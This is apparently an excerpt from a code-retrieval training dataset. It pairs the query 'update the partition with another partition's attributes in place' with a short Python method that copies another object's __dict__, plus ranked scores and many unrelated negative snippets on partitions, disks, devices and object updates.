"def update_prim_properties(self, prim_properties):\n\n _object = self.get_object_from_store(FullID = prim_properties['FullID'])\n\n if _object == None:\n #if self.settings.LOG_VERBOSE and self.settings.ENABLE_OBJECT_LOGGING: logger.debug(\"Creating a new object and storing it's attributes. LocalID = %s\" % (object_properties['LocalID']))\n _object = Object()\n _object._update_properties(prim_properties)\n self.store_object(_object)\n else:\n #if self.settings.LOG_VERBOSE and self.settings.ENABLE_OBJECT_LOGGING: logger.debug(\"Updating an object's attributes. LocalID = %s\" % (object_properties['LocalID']))\n _object._update_properties(prim_properties)\n if _object.UpdateFlags & 2 != 0 and self.agent != None:\n \n self.agent.events_handler.handle(AppEvent(\"ObjectSelected\",\n payload = {'object':_object}))",
"async def do_update(self, data):\n old = await self.config()\n\n new = old.copy()\n new.update(data)\n\n verrors = ValidationErrors()\n\n for attr, minlen, maxlen in (\n ('access_key', 5, 20),\n ('secret_key', 8, 40),\n ):\n curlen = len(new.get(attr, ''))\n if curlen < minlen or curlen > maxlen:\n verrors.add(\n f's3_update.{attr}', f'Attribute should be {minlen} to {maxlen} in length'\n )\n\n if not new['storage_path']:\n verrors.add('s3_update.storage_path', 'Storage path is required')\n else:\n await check_path_resides_within_volume(\n verrors, self.middleware, 's3_update.storage_path', new['storage_path']\n )\n\n if not verrors:\n if new['storage_path'].rstrip('/').count('/') < 3:\n verrors.add(\n 's3_update.storage_path',\n 'Top level datasets are not allowed. i.e /mnt/tank/dataset is allowed'\n )\n else:\n # If the storage_path does not exist, let's create it\n if not os.path.exists(new['storage_path']):\n os.makedirs(new['storage_path'])\n\n if new['certificate']:\n verrors.extend((await self.middleware.call(\n 'certificate.cert_services_validation', new['certificate'], 's3_update.certificate', False\n )))\n\n if new['bindip'] not in await self.bindip_choices():\n verrors.add('s3_update.bindip', 'Please provide a valid ip address')\n\n if verrors:\n raise verrors\n\n new['disks'] = new.pop('storage_path')\n\n await self._update_service(old, new)\n\n if (await self.middleware.call('filesystem.stat', new['disks']))['user'] != 'minio':\n await self.middleware.call(\n 'filesystem.setperm',\n {\n 'path': new['disks'],\n 'mode': str(775),\n 'uid': (await self.middleware.call('dscache.get_uncached_user', 'minio'))['pw_uid'],\n 'gid': (await self.middleware.call('dscache.get_uncached_group', 'minio'))['gr_gid'],\n 'options': {'recursive': True, 'traverse': False}\n }\n )\n\n return await self.config()",
"def update(self, attributes=None):\n\n if attributes is None:\n attributes = {}\n\n headers = self.__class__.create_headers(attributes)\n headers.update(self._update_headers())\n\n result = self._client._put(\n self.__class__.base_url(\n self.sys['id']\n ),\n self.__class__.create_attributes(attributes, self),\n headers=headers\n )\n\n self._update_from_resource(result)\n\n return self",
"def test_partitioner(self):\n args = \"xyzzy\", set([1, 2, 3])\n partitioner = self.tx_client.SetPartitioner(*args)\n self.assertEqual(partitioner.state, PartitionState.ALLOCATING)\n self.assertEqual(partitioner._partitioner.args, args)\n self.assertEqual(partitioner._partitioner.kwargs, {})\n\n partitioner._partitioner.state = PartitionState.ACQUIRED\n self.assertEqual(partitioner.state, PartitionState.ACQUIRED)",
"def _updateComputePartitionRelatedInstanceList(self, compute_node_id,\n compute_partition_id, instance_reference_xml):\n software_instance_document = self.\\\n _getSoftwareInstanceForComputePartition(compute_node_id,\n compute_partition_id)\n\n software_instance_document._updateSucessorList(instance_reference_xml)",
"def update(self, instance, validated_data):\n validated_data.pop(\"assignment\", None)\n return super().update(instance, validated_data)"
] | [
"0.6177643",
"0.5935486",
"0.5843581",
"0.5752055",
"0.57170105",
"0.5648424",
"0.55954295",
"0.5566008",
"0.5558529",
"0.5553988",
"0.55241215",
"0.55186415",
"0.53778905",
"0.530752",
"0.52931553",
"0.5265223",
"0.52628785",
"0.52362907",
"0.52102923",
"0.5176496",
"0.5165835",
"0.51582414",
"0.51418966",
"0.5138581",
"0.5136336",
"0.51306844",
"0.51306844",
"0.5115434",
"0.511426",
"0.5112654",
"0.5100001",
"0.50839776",
"0.50774",
"0.50539404",
"0.50445604",
"0.50263244",
"0.5016713",
"0.49977466",
"0.4988132",
"0.49879402",
"0.49723837",
"0.49512157",
"0.49445704",
"0.4939721",
"0.4937224",
"0.49345723",
"0.49220002",
"0.49079508",
"0.4907716",
"0.49061668",
"0.49038306",
"0.49013907",
"0.4897912",
"0.48926076",
"0.48765892",
"0.4865309",
"0.48609567",
"0.48551986",
"0.48513556",
"0.48511103",
"0.4848271",
"0.48444796",
"0.48350972",
"0.48348364",
"0.48344043",
"0.48332426",
"0.48301762",
"0.48251054",
"0.48064703",
"0.48052517",
"0.48048276",
"0.480245",
"0.47963625",
"0.4788364",
"0.47784653",
"0.47658443",
"0.47645998",
"0.47591382",
"0.47582895",
"0.47571534",
"0.47470367",
"0.4746949",
"0.47457156",
"0.47455892",
"0.47448665",
"0.47421604",
"0.47391418",
"0.47386515",
"0.47377482",
"0.47373757",
"0.47331905",
"0.4730649",
"0.47275564",
"0.47259858",
"0.4711035",
"0.46964675",
"0.46880496",
"0.46857172",
"0.46812508",
"0.4680434",
"0.4680145"
] | 0.0 | -1 |
Completely update the partition with another partition's attributes in place. | def update_inplace_from(self, other):
self.__dict__ = other.__dict__.copy() | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def update(self, metadata):\n p_metas = metadata.partitions\n\n # Remove old partitions\n removed = set(self._partitions.keys()) - set(p_metas.keys())\n if len(removed) > 0:\n log.info('Removing %d partitions', len(removed))\n for id_ in removed:\n log.debug('Removing partition %s', self._partitions[id_])\n self._partitions.pop(id_)\n\n # Add/update current partitions\n brokers = self._cluster.brokers\n if len(p_metas) > 0:\n log.info(\"Adding %d partitions\", len(p_metas))\n for id_, meta in iteritems(p_metas):\n if meta.leader not in brokers:\n raise LeaderNotAvailable()\n if meta.id not in self._partitions:\n log.debug('Adding partition %s/%s', self.name, meta.id)\n self._partitions[meta.id] = Partition(\n self, meta.id,\n brokers[meta.leader],\n [brokers[b] for b in meta.replicas],\n [brokers[b] for b in meta.isr],\n )\n else:\n self._partitions[id_].update(brokers, meta)",
"def _setPartedPartition(self, partition):\n log_method_call(self, self.name)\n\n if partition is not None and not isinstance(partition, parted.Partition):\n raise ValueError(\"partition must be None or a parted.Partition instance\")\n\n log.debug(\"device %s new partedPartition %s\", self.name, partition)\n self._partedPartition = partition\n self.updateName()",
"def update_partition(self, event) -> None:\n self.min_width = 150 * len(self.partition)\n self.request_update()",
"def update(self, instance, validated_data):\n for attr, value in list(validated_data.items()):\n if attr == 'part_details':\n for a, v in list(value.items()):\n setattr(instance.part_details, attr, value)\n else:\n setattr(instance, attr, value)\n instance.save()\n return instance",
"def disk_update(context, disk_id, values):\n return NotImplemented",
"def partition2(self, partition2):\n\n self._partition2 = partition2",
"def update_partition(self, bulk_ad_group_product_partition):\n\n if bulk_ad_group_product_partition is not None and bulk_ad_group_product_partition.ad_group_criterion is not None:\n bulk_ad_group_product_partition.ad_group_criterion.AdGroupId=self._ad_group_id\n bulk_ad_group_product_partition.ad_group_criterion.Status=None\n if hasattr(bulk_ad_group_product_partition.ad_group_criterion, 'EditorialStatus'):\n bulk_ad_group_product_partition.ad_group_criterion.EditorialStatus=None\n self._partition_actions.append(bulk_ad_group_product_partition)",
"def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)",
"def update_part(session=None, data=None):\n data_dict = format_and_check_update_part_request(data)\n if data_dict is None:\n return False\n\n with mc.MCSessionWrapper(session=session) as session:\n for dkey, dval in data_dict.items():\n hpn_to_change = dval[0][0]\n rev_to_change = dval[0][1]\n part_rec = session.query(Parts).filter(\n (func.upper(Parts.hpn) == hpn_to_change.upper())\n & (func.upper(Parts.hpn_rev) == rev_to_change.upper())\n )\n num_part = part_rec.count()\n if num_part == 0:\n part = Parts()\n elif num_part == 1:\n part = part_rec.first()\n set_an_attrib = False\n for d in dval:\n try:\n getattr(part, d[2])\n setattr(part, d[2], d[3])\n set_an_attrib = True\n except AttributeError:\n print(d[2], \"does not exist as a field\")\n continue\n if set_an_attrib:\n session.add(part)\n session.commit()\n cm_utils.log(\"cm_partconnect part update\", data_dict=data_dict)\n\n return True",
"def PatchPartition(self, target, source, patch):\n self._CheckSecondTokenNotSlotSuffixed(target, \"PatchPartitionExpr\")\n self._CheckSecondTokenNotSlotSuffixed(source, \"PatchPartitionExpr\")\n self.PatchPartitionExpr('\"%s\"' % target, '\"%s\"' % source, '\"%s\"' % patch)",
"def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()",
"def update(self, other):\n for name, value in other.items():\n self.__setitem__(name, value)",
"def _computeResize(self, partition, newsize=None):\n log_method_call(self, self.name, status=self.status)\n\n if newsize is None:\n newsize = self.targetSize\n\n # compute new size for partition\n currentGeom = partition.geometry\n currentDev = currentGeom.device\n newLen = int(newsize) / currentDev.sectorSize\n newGeometry = parted.Geometry(device=currentDev,\n start=currentGeom.start,\n length=newLen)\n # and align the end sector\n if newGeometry.length < currentGeom.length:\n align = self.disk.format.endAlignment.alignUp\n alignGeom = currentGeom # we can align up into the old geometry\n else:\n align = self.disk.format.endAlignment.alignDown\n alignGeom = newGeometry\n\n newGeometry.end = align(alignGeom, newGeometry.end)\n constraint = parted.Constraint(exactGeom=newGeometry)\n\n return (constraint, newGeometry)",
"def _setSize(self, newsize):\n log_method_call(self, self.name,\n status=self.status, size=self._size, newsize=newsize)\n if not isinstance(newsize, Size):\n raise ValueError(\"new size must of type Size\")\n\n if not self.exists:\n # device does not exist (a partition request), just set basic values\n self._size = newsize\n self.req_size = newsize\n self.req_base_size = newsize\n\n if self.exists:\n super(PartitionDevice, self)._setSize(newsize)\n return\n\n # the rest is for changing the size of an allocated-but-not-existing\n # partition, which I'm not sure is advisable\n if self.disk and newsize > self.disk.size:\n raise ValueError(\"partition size would exceed disk size\")\n\n if not self.partedPartition:\n log.warn(\"No partedPartition, not adjusting geometry\")\n return\n\n maxAvailableSize = Size(self.partedPartition.getMaxAvailableSize(unit=\"B\"))\n\n if newsize > maxAvailableSize:\n raise ValueError(\"new size is greater than available space\")\n\n # now convert the size to sectors and update the geometry\n geometry = self.partedPartition.geometry\n physicalSectorSize = geometry.device.physicalSectorSize\n\n new_length = int(newsize) / physicalSectorSize\n geometry.length = new_length",
"def update(self, other):\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Torrent):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def partition1(self, partition1):\n\n self._partition1 = partition1",
"def update(self, other):\n self._start = other._start\n self._end = other._end\n self._nodes = {k: v.copy() for k,v in other._nodes.iteritems()}\n self._edges = {k: set(v) for k,v in other._edges.iteritems()}\n self._names = set(other._names)\n self.current = other.current",
"def update(self, other):\n _merge_dicts(self, other)",
"def preCommitFixup(self):\n log_method_call(self, self.name)\n if not self.exists or not self.disklabelSupported:\n return\n\n # find the correct partition on the original parted.Disk since the\n # name/number we're now using may no longer match\n _disklabel = self.disk.originalFormat\n\n if self.isExtended:\n # getPartitionBySector doesn't work on extended partitions\n _partition = _disklabel.extendedPartition\n log.debug(\"extended lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n else:\n # lookup the partition by sector to avoid the renumbering\n # nonsense entirely\n _sector = self.partedPartition.geometry.start\n _partition = _disklabel.partedDisk.getPartitionBySector(_sector)\n log.debug(\"sector-based lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n\n self.partedPartition = _partition",
"def _update(self, device=None):\n self._attr_available = True\n self.schedule_update_ha_state(True)",
"def set_partition(self, begin=0, end=0):\r\n self.partition = (begin, end)",
"def update(self, other):\n\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Session):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def update(self, other):\n b = self.hallucinate_merge(other)\n self.l_child = b.l_child\n self.r_child = b.r_child",
"def hard_update(self,target, source):\n\t\tfor target_param, param in zip(target.parameters(), source.parameters()):\n\t\t\t\ttarget_param.data.copy_(param.data)",
"def update(self, **values):\r\n if self.__abstract__:\r\n raise ThunderdomeException('cant update abstract elements')\r\n self.pre_update(**values)\r\n for key in values.keys():\r\n if key not in self._columns:\r\n raise TypeError(\"unrecognized attribute name: '{}'\".format(key))\r\n\r\n for k,v in values.items():\r\n setattr(self, k, v)\r\n\r\n return self.save()",
"def partitioning_attribute(self, partitioning_attribute):\n\n self._partitioning_attribute = partitioning_attribute",
"def _lock_partition(self, partition, shared=False):\n pass",
"def update_device(self, dev_dict):\n # Note(jprabh1x): added bus,slot,function into fields dict as \n # seperate fields.\n no_changes = ('status', 'instance_uuid', 'id', 'extra_info', 'workload')\n map(lambda x: dev_dict.pop(x, None),\n [key for key in no_changes])\n\n # Note(jprabh1x): populating values for bus,slot,function from address in dev_dict.\n if dev_dict.has_key(\"address\"):\n \t\taddress = pci_utils.parse_address(dev_dict[\"address\"])\n \t\tdev_dict.update({'bus':str(address[1]), 'slot':str(address[2]), 'function':str(address[3])})\n for k, v in dev_dict.items():\n if k in self.fields.keys():\n self[k] = v\n else:\n extra_info = self.extra_info\n extra_info.update({k: str(v)})\n self.extra_info = extra_info",
"def update(self, other: dict):\n for key in other:\n if key in self:\n self[key] = other[key]",
"def test_partial_updates(self):\r\n m1 = TestSetModel.create(int_set={1, 2, 3, 4})\r\n\r\n m1.int_set.add(5)\r\n m1.int_set.remove(1)\r\n assert m1.int_set == {2, 3, 4, 5}\r\n\r\n m1.save()\r\n\r\n m2 = TestSetModel.get(partition=m1.partition)\r\n assert m2.int_set == {2, 3, 4, 5}",
"def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def perform_swap(self, replica_i, replica_j):\n param_i = replica_i.parameter\n replica_i.parameter = replica_j.parameter\n replica_j.parameter = param_i",
"def perform_update(self, serializer):\n extra_data = self.get_additional_data(False)\n serializer.save(**extra_data)",
"def set_partition(self, partition=0):\n if not isinstance(partition, int):\n raise TypeError('partition must be an integer')\n if partition <= 0:\n raise ValueError('partition must be positive')\n if self.connected:\n self.producer.send(\"PART:\"+str(partition))",
"def provide_partition_info(self):\n self.partition_info = True",
"def update(self, other={}, **kwargs):\n joined = dict(other, **kwargs)\n\n # Update with the new set of k:v pairs,\n # but delete existing keys which are being assigned the value of None\n for k, v in joined.items():\n if v is None:\n if k in self:\n del self[k]\n else:\n self[k] = v",
"def update(self, dbase):\n dbase.updateVirtualSpace(\n self.__id,\n self.__name,\n self.__host,\n self.__size\n )",
"def hard_update(target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)",
"def update(self):\n with managed_session() as session:\n session.merge(self)",
"def update(self, idx: int, new_priority: T.Union[int, float]):\n old_priority, item = self.__heap[idx]\n self.__heap[idx] = (new_priority, item)\n\n if new_priority < old_priority:\n self.__sift_up(idx)\n else:\n self.__sift_down(idx)",
"def expand_second_partition(device):\n\n print('Deleting the original boot partition from the thumb drive')\n _delete_partition(device, 1)\n\n print('Expanding the partition. Resizing isn\\'t worth it. Or obvious to do.')\n resize_command = ['sudo', 'parted', device.path, 'resizepart', '2', '\"-1s\"']\n interactive_console(resize_command)\n\n print('Fixing the nibbly bits for the partition itself')\n target_partition = device.partitions(full_paths=True)[0]\n interactive_console(['sudo', 'e2fsck', '-f', target_partition])\n\n print('Fixing ext4 so it goes all the way to the end')\n target_end = device.partition_specs(2)['End']\n interactive_console(['sudo', 'resize2fs', target_partition, target_end])\n\n print('Success!')",
"def soft_update(self, other, tau):\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)",
"def refresh(self, context=None):\n current = self.__class__.get_by_uuid(self._context,\n cluster=self.cluster_id,\n uuid=self.uuid)\n for field in self.fields:\n if self.obj_attr_is_set(field) and self[field] != current[field]:\n self[field] = current[field]",
"def on_edit_clicked(self,button):\n\t\tself.list_partitions.edit_partition()",
"def update(self, attributes=None):\n\n if attributes is None:\n attributes = {}\n\n headers = self.__class__.create_headers(attributes)\n headers.update(self._update_headers())\n\n result = self._client._put(\n self.__class__.base_url(\n self.sys['id']\n ),\n self.__class__.create_attributes(attributes, self),\n headers=headers\n )\n\n self._update_from_resource(result)\n\n return self",
"def _pd_update(pd, fields):\n pd.name = fields['name']\n pd.price = fields['price']\n pd.quantity_per_package = fields['quantity_per_package']\n pd.unit = fields['unit']\n pd.quantity_limit = fields['quantity_limit']\n pd.unit_weight = fields['unit_weight']\n pd.quantum = fields['quantum']",
"def update_dict(new,old):",
"def get_assignment_for_partition_update(self, topic_name, partitions):\n all_brokers = []\n assign = {'partitions': {}, 'version': 1}\n\n _, _, _, replicas, _, _ = self.get_partitions_for_topic(topic_name)[0]\n total_replica = len(replicas)\n\n for node_id, _host, _port, _rack in self.get_brokers():\n all_brokers.append(node_id)\n brokers_iterator = itertools.cycle(all_brokers)\n\n for i in range(partitions):\n assign_tmp = []\n for _j in range(total_replica):\n assign_tmp.append(next(brokers_iterator))\n assign['partitions'][str(i)] = assign_tmp\n\n return bytes(str(json.dumps(assign)).encode('ascii'))",
"def update(self,\n tier1_id,\n segment_id,\n port_id,\n segment_port,\n ):\n return self._invoke('update',\n {\n 'tier1_id': tier1_id,\n 'segment_id': segment_id,\n 'port_id': port_id,\n 'segment_port': segment_port,\n })",
"def update_obj(obj, attributes, params):\n for key in params.keys():\n if key in attributes:\n try:\n set_attribute(obj, key, params[key])\n except:\n abort(400)\n \n Session.flush()\n Session.commit()",
"def save_partition(self, partition):\n raise NotImplementedError('save_file')",
"def FormatPartition(self, partition):\n\n fstab = self.fstab\n if fstab:\n p = fstab[partition]\n self.script.append('format(\"%s\", \"%s\", %s, \"%s\", \"%s\");' %\n (p.fs_type, common.PARTITION_TYPES[p.fs_type],\n self._GetSlotSuffixDeviceForEntry(p),\n p.length, p.mount_point))",
"def _update(self, datapoints):\r\n if len(datapoints) == 1:\r\n timestamp, value = datapoints[0]\r\n whisper.update(self.path, value, timestamp)\r\n else:\r\n whisper.update_many(self.path, datapoints)",
"def copyAttributes(self, other, add_nxpars=False):\n import copy\n \n self.setTitle(other.getTitle())\n self.setDataSetType(other.getDataSetType())\n self.setAllAxisLabels(other.getAllAxisLabels())\n self.setAllAxisUnits(other.getAllAxisUnits())\n self.setYLabel(other.getYLabel())\n self.setYUnits(other.getYUnits())\n if len(self.attr_list.keys()) == 0:\n self.attr_list = copy.copy(other.attr_list)\n else:\n self.attr_list.instrument = copy.copy(other.attr_list.instrument)\n self.attr_list.sample = copy.copy(other.attr_list.sample)\n\n if add_nxpars:\n nxpar_keys = [item[0] for item in self.attr_list.iteritems() \\\n if isinstance(item[1], NxParameter)]\n\n for nxpar_key in nxpar_keys:\n self.attr_list[nxpar_key] += other.attr_list[nxpar_key]\n else:\n # Do nothing\n pass\n \n keys_to_get = [other_key for other_key in other.attr_list \\\n if other_key not in self.attr_list]\n \n for key_to_get in keys_to_get:\n self.attr_list[key_to_get] = \\\n copy.copy(other.attr_list[key_to_get])",
"def partitionname(self, partitionname) :\n\t\ttry :\n\t\t\tself._partitionname = partitionname\n\t\texcept Exception as e:\n\t\t\traise e",
"def merge_from(self, other):\n assert not self.is_final\n if self.parent is not None:\n assert other.parent is not None\n self.parent.merge_from(other.parent)\n self.isolated_names.update(other.isolated_names)\n self.read.update(other.read)\n self.modified.update(other.modified)\n self.bound.update(other.bound)\n self.deleted.update(other.deleted)\n self.annotations.update(other.annotations)\n self.params.update(other.params)",
"def on_partition_change(self, new_partitions):\n if new_partitions is None:\n self.conn.create(self.partition_path, value=self.partitions)\n return\n\n if new_partitions != self.partitions:\n self.partitions = new_partitions\n self.rebalance()\n\n self.partitions_collected.set()",
"def copy(self):\n new = Partition.__new__(Partition)\n new.__dict__ = self.__dict__.copy()\n\n self._increment_file_counter()\n\n return new",
"def _update(self, other):\n # NOTE: detail map properties should NEVER be overridden. NEVER. EVER. kthx.\n if other.use_alpha:\n self.use_alpha = True\n if other.mipmap:\n self.mipmap = True",
"def update(self, instance, validated_data):\n instance.product_name = validated_data.get('product_name', instance.product_name)\n instance.product_mrp = validated_data.get('product_mrp', instance.product_mrp)\n instance.save()\n return instance",
"def partition_session(self):\n if self.user['drive']['name'] is not None:\n\n # Set root size\n if self.user['root_freespace'] is True:\n self.user['root_size'] = 'freespace'\n\n # Set partition parameters\n self.user['partitions'] = {'name': ['boot', 'root'],\n 'size': [self.user['boot_size'],\n self.user['root_size']],\n 'filesystem': ['fat32', 'ext4'],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap size and filesystem\n if 'Swap' in self.user['optional_partitions']:\n self.user['partitions']['size'].insert(1, self.user['swap_size'])\n self.user['partitions']['filesystem'].insert(1, 'swap')\n\n # Set home size and filesystem\n if 'Home' in self.user['optional_partitions']:\n if self.user['home_freespace'] is True:\n self.user['home_size'] = 'freespace'\n self.user['partitions']['size'].append(self.user['home_size'])\n self.user['partitions']['filesystem'].append('ext4')\n\n # Custom partitions\n else:\n\n # Set partition parameters\n self.user['partitions'] = {\n 'name': ['boot', 'root'],\n 'drive_id': [self.user['boot_id'].split()[0],\n self.user['root_id'].split()[0]],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap drive ID\n if self.user['swap_id'] is not None:\n self.user['partitions']['drive_id'].insert(\n 1, self.user['swap_id'].split()[0])\n\n # Set home drive ID\n if self.user['home_id'] is not None:\n self.user['partitions']['drive_id'].append(\n self.user['home_id'].split()[0])\n\n # Set swap parameters\n if ('Swap' in self.user['optional_partitions']) or \\\n (self.user['swap_id'] is not None):\n self.user['partitions']['name'].insert(1, 'swap')\n self.user['partitions']['mountpoint'].insert(1, 'swap')\n self.user['partitions']['mountorder'].insert(1, 2)\n\n # Set home parameters\n if 'Home' in self.user['optional_partitions'] or \\\n (self.user['home_id'] is not None):\n self.user['partitions']['name'].append('home')\n self.user['partitions']['mountpoint'].append('/mnt/home')\n self.user['partitions']['mountorder'].append(3)",
"def partition_key(self, partition_key):\n\n self._partition_key = partition_key",
"def update(self):\n\n raise NotImplementedError('Must be implemented by subclasses')",
"async def do_update(self, data):\n old = await self.config()\n\n new = old.copy()\n new.update(data)\n\n verrors = ValidationErrors()\n\n for attr, minlen, maxlen in (\n ('access_key', 5, 20),\n ('secret_key', 8, 40),\n ):\n curlen = len(new.get(attr, ''))\n if curlen < minlen or curlen > maxlen:\n verrors.add(\n f's3_update.{attr}', f'Attribute should be {minlen} to {maxlen} in length'\n )\n\n if not new['storage_path']:\n verrors.add('s3_update.storage_path', 'Storage path is required')\n else:\n await check_path_resides_within_volume(\n verrors, self.middleware, 's3_update.storage_path', new['storage_path']\n )\n\n if not verrors:\n if new['storage_path'].rstrip('/').count('/') < 3:\n verrors.add(\n 's3_update.storage_path',\n 'Top level datasets are not allowed. i.e /mnt/tank/dataset is allowed'\n )\n else:\n # If the storage_path does not exist, let's create it\n if not os.path.exists(new['storage_path']):\n os.makedirs(new['storage_path'])\n\n if new['certificate']:\n verrors.extend((await self.middleware.call(\n 'certificate.cert_services_validation', new['certificate'], 's3_update.certificate', False\n )))\n\n if new['bindip'] not in await self.bindip_choices():\n verrors.add('s3_update.bindip', 'Please provide a valid ip address')\n\n if verrors:\n raise verrors\n\n new['disks'] = new.pop('storage_path')\n\n await self._update_service(old, new)\n\n if (await self.middleware.call('filesystem.stat', new['disks']))['user'] != 'minio':\n await self.middleware.call(\n 'filesystem.setperm',\n {\n 'path': new['disks'],\n 'mode': str(775),\n 'uid': (await self.middleware.call('dscache.get_uncached_user', 'minio'))['pw_uid'],\n 'gid': (await self.middleware.call('dscache.get_uncached_group', 'minio'))['gr_gid'],\n 'options': {'recursive': True, 'traverse': False}\n }\n )\n\n return await self.config()",
"def update(self, attributes):\n for key in attributes:\n k = key.lower()\n if not isinstance(attributes[key], str) or attributes[key] != '':\n k_ = k.strip(' =:\\t\\n').replace('', '')\n self.attributes.update({k_: attributes[key]})\n elif k in self.attributes:\n del self.attributes[k]",
"def update(self, other: Mapping[str, Any]) -> None:\n self._config.update(self._flatten_dict(other))",
"def merge(self, new_attributes):\n for k, v in new_attributes.items():\n setattr(self, k, v)",
"def update(self):\n if self._skip_update:\n self._skip_update = False\n return\n\n try:\n for prop in AIRER_PROPS:\n self.status[prop] = self.send('get_prop', [prop])[0]\n _LOGGER.debug(\"MiioDevice update: %s\", self.status)\n self.available = True\n self._retry = 0\n except Exception as exc:\n _LOGGER.error(\"Error on update: %s\", exc)\n self._retry += 1\n if self._retry > 3:\n self.available = False\n\n for entity in self.update_entities:\n entity.async_schedule_update_ha_state()",
"def testUpdate(self):\n try:\n provU = ProvenanceProvider(self.__cfgOb, self.__cachePath, useCache=False)\n pD = {self.__provKeyName: self.__provInfoL}\n ok = provU.store(pD)\n self.assertTrue(ok)\n #\n ok = provU.update(pD)\n self.assertTrue(ok)\n #\n fD = provU.fetch()\n self.assertTrue(self.__provKeyName in fD)\n self.assertDictEqual(pD, fD)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()",
"def do_update(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n elif not args[0] in class_type:\n print(\"** class doesn't exist **\")\n elif len(args) == 1:\n print(\"** instance id missing **\")\n elif (\"{}.{}\".format(args[0], args[1]) not in storage.all().keys()):\n print(\"** no instance found **\")\n elif len(args) == 2:\n print(\"** attribute name missing **\")\n elif len(args) == 3:\n print(\"** value missing **\")\n else:\n new_dict = models.storage.all()\n tmp = \"{}.{}\".format(args[0], args[1])\n if tmp in new_dict.keys():\n attr = getattr(new_dict[tmp], args[2], \"\")\n setattr(new_dict[tmp], args[2], type(attr)(args[3]))\n new_dict[tmp].save()",
"def update(self):\n self.__execute(self.pkgin_bin, \"update\")",
"def test_partially_update_device_by_id1(self):\n pass",
"def update(self, key, node, local_edges, foreign_edges, transaction_id):\n assert self.row_exists(key, transaction_id), \"Key does not exist\"\n\n last_node = self.rows[key][-1]\n node = last_node.copy(node, local_edges, foreign_edges, transaction_id)\n self._create_or_update_row(key, node)",
"def addPartition(self,partitionData):\n self.PCAs[partitionData.id] = partitionData\n self.pcaStatemachineLock[partitionData.id] = threading.Lock()\n self.StateMachineForPca[partitionData.id] = Statemachine(self.StateMachineFile,\"Unconfigured\")\n self.isPCAinTransition[partitionData.id] = False\n self.pcaSequenceNumber[partitionData.id] = 0",
"def update(self, **params):\n self.parameters.update(params)",
"def update(cls) -> None:\n raise NotImplementedError",
"def do_update(self, args):\n args = args.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n if len(args) == 1:\n print(\"** instance id missing **\")\n return\n if len(args) == 2:\n print(\"** attribute name missing **\")\n return\n if len(args) == 3:\n print(\"** value missing **\")\n return\n if args[0] not in HBNBCommand.valid_classes.keys():\n print(\"** class doesn't exist **\")\n return\n all_objs = storage.all(args[0])\n for k, v in all_objs.items():\n if k == args[1]:\n setattr(v, args[2], args[3])\n storage.save()\n return\n print(\"** no instance found **\")",
"def update_rec(self):\n import copy\n \n self.leftrec, self.rightrec = copy.copy(self.rec), copy.copy(self.rec)\n self.leftrec[2*self.dim + 1], self.rightrec[2*self.dim] = self.node.dimension[self.dim], self.node.dimension[self.dim]",
"def visit_record(self, syrecord):\n for other_key, other_value in syrecord.items():\n try:\n getattr(self.current, other_key).update(other_value)\n except KeyError:\n setattr(self.current, other_key, other_value)",
"def update(self, *args, **kwargs):\n raise NotImplementedError",
"def update(self, other):\n if self.active:\n self.active.functor.update(other)",
